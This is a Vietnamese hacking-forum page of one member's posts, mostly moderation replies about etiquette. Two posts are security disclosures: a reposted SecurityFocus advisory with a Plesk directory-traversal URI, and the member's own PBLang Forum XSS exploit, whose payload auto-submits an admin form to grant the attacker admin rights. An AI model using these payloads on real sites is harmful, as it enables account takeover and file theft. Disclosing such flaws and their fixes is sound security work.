banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: Quan Vân Trường  XML
Profile for Quan Vân Trường Messages posted by Quan Vân Trường [ number of posts not being displayed on this page: 17 ]
 
Đã PM smilie..
Ý kiến của em: cái "firewall" này ko hiệu quả cho lắm smilie... Chỉ check HTTP REFERER ko thui thì có vẻ ko ổn, cái REFERER có thể làm giả dc mà... Em nghĩ hiệu quả hơn vẫn là nhập số từ image.

novsf wrote:
http://vnhacker.org/hvaonline/posts/list/4507.html

HVA's mod có khiêm tốn không vậy ?
Tôi góp ý để các bạn làm tốt hơn thôi à.
Sao phải khóa topic ??

Hay bạn tưởng ở đây mọi thứ đã pefect hết, ai muốn, ai vào được thì vào còn không thì thôi. HVA khỏi cần ai ??

Bó tay !!!! 


Xin hỏi bạn điểm nào cho thấy điều tiết viên của HVA "không khiêm tốn" ??
Về vấn đề bạn cần hỏi, vui lòng xem tại đây: http://vnhacker.org/hvaonline/posts/list/2250.html (nếu chủ đề này không đủ để giải quyết vấn đề của bạn, xin vui lòng tìm kiếm kĩ hơn).
Theo QVT biết thì không có từ "pefect" smilie) .

Vài góp ý với bạn: Xin vui lòng suy nghĩ kĩ trước khi phát biểu, tìm kiếm kĩ trước khi thắc mắc và xem lại thái độ của bạn trên diễn đàn smilie) .
Chủ đề mà bạn thắc mắc được đóng vì vấn đề đã được giải quyết trong các chủ đề trước. Nếu bạn cảm thấy HVA không tuyệt như bạn đã tưởng thì bạn có thể không tham gia vào diễn đàn mà smilie) .

shelling wrote:
Vào diễn đàn hỏi,thì trả lời mơ hồ quá!trae lời vậy cũng như ko?quan trọng là cách ứng xử thôi!
em đang cần gấp,gặp anh ây thì nói này nói nọ! 


Vui lòng xem lại điều "Thứ ba".
Có lẽ bạn không hiểu tính chất của 1 "diễn đàn". Đây là nơi trao đổi, thảo luận thông tin, không phải là nơi hỏi & đáp thông tin kĩ thuật. Điều tiết viên không có nghĩa vụ phải trả lời tất cả mọi thắc mắc kĩ thuật của thành viên.
Hãy xem lại cách ứng xử của bạn trước đã.
P/S: không gì chứng minh đây là điều tiết viên của HVA.
Thật vớ vẩn.
Thứ nhất: Ko có gì để chứng minh đó là một điều tiết viên của HVA.
Thứ hai: Mọi hoạt động trao đổi thông tin ngoài diễn đàn HVA không thuộc trách nhiệm của HVA.
Thứ ba: điều tiết viên có quyền không trả lời bất cứ thắc mắc kĩ thuật nào của thành viên.
Thứ tư: hãy xem lại lời nói (+ tư cách) của bạn trước khi nhận xét & đánh giá ai đó.
Thân.
Vulnerable version: Plesk Plesk Reload 7.5, Plesk Plesk for Windows 7.6

Description:
PLESK is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.
Versions 7.5 Reload and prior, and 7.6 for windows are vulnerable to this issue; other versions may also be affected.

Exploit:
Attackers may exploit this vulnerability via a web client.
An example URI has been provided:

https://www.example.com:8443/filemanager/filemanager.php?cmd=chdir&file=../

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.
Reportedly, the vendor has released fixes to address this issue. Symantec has not confirmed this.

Nguồn: SecurityFocus http://www.securityfocus.com/bid/20155) :wink: :wink:

channhua wrote:
LỖi DHDB (Google Hacking Database) nếu mình để .mdb ở server khác thì vẫn scan ra được mà anh ? đâu cần phải chung server mới bị lỗi này 


Ý anh conmale là thế này:
Vd:
Web root là "C:\Inetpub\wwwroot\" thì ta đặt *.mdb ra khỏi folder đấy (vd đặt vào "C:\Data\" .v.v.). Khi đấy "googlebots" sẽ ko tìm thấy được.

Thân.
/--------------------------------------
Product: PBLang Forum
Version: 4.67.14.a + older
Vuln: XSS
Rate: khá nguy hiểm
Homepage: http://pblforum.drmartinus.de/ (tested)
Author: Quan Vân Trường
--------------------------------------/

Sơ lượt:
PBLang Forum: viết bằng ngôn ngữ PHP, khá ổn định, đặc biệt: sử dụng file làm DB. Một số "điểm yếu" đã được phát hiện trước đây: XSS, cookie, code injection...
Trong đó, "điểm yếu" chết người nhất là: ko tách ACP ra khỏi main forum => chỉ cần login 1 lần là có thể vào đến ACP. Mặt khác, trong ACP có mục "Grant Status". Ta sẽ sử dụng XSS để submit form "Grant Status" theo ý mình.
XSS dc tìm thấy tại file profile.php

Khai thác:
Chỉ cần admin của forum vào URL này:

hxxp://[path_to_PBLang]/profiles.php?u=
<form name=hack method=post action=http://localhost/PBL/admin2.php?do=grantm2>
<input type=hidden name=user value=[username của bạn]><input type=hidden name=stat value=7></form>
<body onload=document.hack.submit()>

Bạn sẽ trở thành admin. Chú ý, tất cả các tag cùng 1 dòng, em phải xuống dòng cho dễ nhìn...

Khắc phục:
Thực ra PBLang đã fix bug XSS tại mục này, vấn đề phát sinh XSS là do PBLang dùng file để làm DB và để lấy info của 1 user, PBLang phải dùng fopeninclude => error có chứa XSS mà ta đã tạo.
Vậy, ta cần vô hiệu hoá các báo lỗi bằng cách thêm "@" vào trước fopeninclude, cái này ai đã học qua PHP đều biết, em ko nói thêm.

Thân.
 
Go to Page:  First Page 1 2 3

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|